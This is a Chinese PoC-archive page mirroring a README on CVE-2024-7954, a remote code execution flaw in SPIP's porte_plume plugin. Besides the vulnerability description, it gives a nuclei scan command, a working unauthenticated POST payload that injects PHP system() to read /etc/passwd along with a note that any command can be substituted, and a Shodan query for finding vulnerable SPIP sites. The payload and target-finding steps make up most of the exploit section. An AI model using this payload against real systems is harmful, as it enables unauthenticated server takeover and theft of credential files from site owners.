关联漏洞
标题:
SPIP 安全漏洞
(CVE-2024-7954)
描述:SPIP是SPIP开源的一个用于创建 Internet 站点的免费软件。 SPIP存在安全漏洞,该漏洞源于容易受到任意代码执行漏洞的影响,远程未经身份验证的攻击者可以通过发送精心设计的HTTP请求以SPIP用户身份执行任意PHP。
介绍
# RCE-CVE-2024-7954
## Description
The **porte_plume** plugin, utilized by SPIP versions prior to **4.30-alpha2**, **4.2.13**, and **4.1.16**, is susceptible to a critical **arbitrary code execution (RCE)** vulnerability. This flaw allows a remote, unauthenticated attacker to execute arbitrary PHP code as the SPIP user by crafting a specific HTTP request. The potential for exploitation is severe, enabling attackers to run malicious commands on the server, which could lead to unauthorized access, data breaches, or further system compromise.
### Vulnerability Details
- **Affected Software:** SPIP (prior to versions 4.30-alpha2, 4.2.13, and 4.1.16)
- **Type of Vulnerability:** Remote Code Execution (RCE)
- **Severity Level:** Critical
- **Exploitability:** Remote and unauthenticated attackers can exploit this vulnerability.
## Exploit
##Nuclei Scan
```
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml
```
An example of a crafted HTTP request that can be used to exploit this vulnerability is as follows:
```
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded
data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB
```
### Explanation of the Exploit:
- The `POST` request is directed to the **porte_plume_previsu** action of SPIP's index.php file.
- The **data** parameter contains a payload that leverages PHP's `system()` function to execute a command (in this case, `cat /etc/passwd`), which reads the contents of the password file.
- By changing the command within the `system()` function, an attacker could execute any PHP code on the server, leading to severe consequences.
## Shodan Dork
To identify potentially vulnerable SPIP installations, the following Shodan search query can be used:
```
app="SPIP"
```
This vulnerability underscores the importance of keeping software up to date and implementing robust security measures to protect against exploitation.
文件快照
[4.0K] /data/pocs/c3334eff89c8c07ff85477d4211705e13ccdb214
└── [2.0K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。